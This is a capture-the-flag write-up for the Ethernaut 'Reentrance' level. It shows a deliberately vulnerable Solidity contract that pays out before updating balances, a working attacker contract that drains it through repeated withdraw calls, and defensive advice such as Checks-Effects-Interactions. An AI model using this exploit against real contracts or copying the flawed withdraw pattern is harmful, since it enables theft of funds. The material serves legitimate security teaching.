10 - Reentrancy

classic reentrancy attack

Ethernaut Level10: Reentrancy

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import 'openzeppelin-contracts-06/math/SafeMath.sol';

contract Reentrance {
  
  using SafeMath for uint256;
  mapping(address => uint) public balances;

  function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
  }

  function balanceOf(address _who) public view returns (uint balance) {
    return balances[_who];
  }

  function withdraw(uint _amount) public {
    if(balances[msg.sender] >= _amount) {
      (bool result,) = msg.sender.call{value:_amount}("");
      if(result) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }

  receive() external payable {}
}d

Goal of this level

• steal all the funds from the contract

What you should know before

• reentrancy attack -> see here

Solution

Key to solve this problem 🔑

This level can easily be solved using classic reentrancy attack.

contract AttackReentrance {
    function attack(Reentrance reentranceContract) external payable {
        reentranceContract.donate{value: msg.value}(address(this));
        reentranceContract.withdraw(0.001 ether);
    }

    receive() external payable {
        msg.sender.call(abi.encodeWithSignature("withdraw(uint256)", 0.001 ether));
    }
}

Call attack function with 0.001 ether .

Done! 😎

Key Takeaways

• To prevent reentrancy attack, you must make sure you are usning Checks-Effects-Interactions pattern

• Or use ReentrancyGuard or PullPayment

• You can also use transfer or send function to limit gas, this is not recommended.